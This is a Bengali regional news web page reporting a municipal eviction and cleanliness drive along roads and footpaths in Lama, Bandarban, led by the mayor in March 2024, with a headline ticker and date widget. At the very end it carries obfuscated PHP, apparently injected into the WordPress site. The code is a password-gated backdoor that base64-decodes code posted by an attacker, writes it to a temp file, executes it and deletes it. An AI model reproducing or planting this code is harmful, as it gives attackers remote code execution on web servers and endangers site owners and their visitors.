• বুধবার, ১৯ জুন ২০২৪, ১০:২৫ অপরাহ্ন
সর্বশেষ খবর
শুধু এক টুকরো মাংস চায়, তাড়িয়ে দিলেও বার বার হাত বাড়ায় সৈকতে ঘুরতে গিয়ে দুর্বৃত্তের ছুরিকাঘাতে নিহত হোটেল কর্মী ঈদগাঁওতে পুকুরে ডুবে আদিবা-ইলমার মৃত্যু প্রথমবারের মতো প্রধানমন্ত্রীর সফর সঙ্গী হতে যাচ্ছেন নবনিযুক্ত প্রেস সচিব নাইমুল ইসলাম খান   সন্দ্বীপে যুবকের বিরুদ্ধে ভিসা দেয়ার নামে টাকা হাতিয়ে নেয়ার অভিযোগ : ভুক্তভোগীর উপর হামলা পাসপোর্ট ফিরে পেতে প্রধানমন্ত্রী ও ডিজির হস্তক্ষেপ কামনা :৪ বছরেও নাবায়ন হয়নি নির্যাতিত সাংবাদিক ফরিদুলের ডিজিটাল পাসপোর্ট শপথ গ্রহণ করেছেন কক্সবাজারের ৩ উপজেলা পরিষদের নবনির্বাচিত চেয়ারম্যান কক্সবাজারে ৬ নং বিপদ সংকেত  কক্সবাজারে মাংসের বাজারে কসাইদের অরাজকতা, বিক্রি হচ্ছে অন্য প্রাণীর গোস্ত বন্দরে ৩ নম্বর সংকেত,উপকূলে ১০ফুট জলোচ্ছ্বাসের আশংকা

লামা পরিষ্কার-পরিচ্ছন্নতা পৌরসভার উচ্ছেদ অভিযান

মো:নুরুচছফা ইসলাম
আপডেট : রবিবার, ১৭ মার্চ, ২০২৪

মোঃ নুরুচছফা ইসলাম :স্টাফ রিপোর্টার


বান্দরবানের লামা পৌর এলাকায় উপজেলা পরিষদ চত্বর থেকে লামা বাজার হয়ে গজালিয়া জীপ ষ্টেশন পর্যন্ত সড়ক ও ফুটপাত দখলমুক্তকরণ,অবৈধ স্থাপনা উচ্ছেদ সহ বাজার এলাকায় পরিস্কার-পরিচ্ছন্নতা অভিযান পরিচালনা করা হয়। অবৈধভাবে দখলকৃত ফুটপাত থেকে হকারদের উচ্ছেদ অভিযান চালিয়েছেন লামা পৌর সভার মেয়র মোঃ জহিরুল ইসলাম।

সোমবার (১১ মার্চ) সকাল ১০টা থেকে অভিযান শুরু হয়। এ সময় লামা থানা পুলিশের টিম,
পৌর কর্মকর্তা-কর্মচারী বৃন্দ,গণমাধ্যমকর্মী,কাউন্সিলর বৃন্দ,বাজার ব্যবসায়ী সমিতির নের্তৃবৃন্দ,পৌর নিরাপত্তাকর্মী অংশ নেন। অভিযানে সড়ক ও ফুটপাতে হকারদের বাঁশ,চৌকি,খাট,টেবিল,তেলপার জব্দ করে পৌরসভার গাড়িতে তোলা হয়।

পৌর এলাকার সাধারণ মানুষ মেয়রের এই উদ্যোগকে স্বাগত জানিয়ে প্রশংসা করেছেন।তারা অভিযান অব্যাহত রাখার আহবান জানান।

পৌর মেয়র মোঃ জহিরুল ইসলাম জানান,লামা বাজারে জনগনের পথচলা নির্বিগ্ন করতেই আমাদের এই প্রচেষ্টা। সড়ক ফুটপাত দখলমুক্ত না হওয়া পর্যন্ত এ অভিযান চলবে। এসময় তিনি বলেন,বাজার ব্যবসায়ি পৌর এলাকার নাগরিকের সহযোগিতা অব্যাহত থাকলে সুন্দর ও নিরাপদ শহর গড়ে তোলা সম্ভব।


আরো বিভন্ন নিউজ দেখুন

ই-পেপার

আজকের দিন-তারিখ

  • বুধবার (রাত ১০:২৫)
  • ১৯শে জুন, ২০২৪ খ্রিস্টাব্দ
  • ১৩ই জিলহজ, ১৪৪৫ হিজরি
  • ৫ই আষাঢ়, ১৪৩১ বঙ্গাব্দ (বর্ষাকাল)
if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}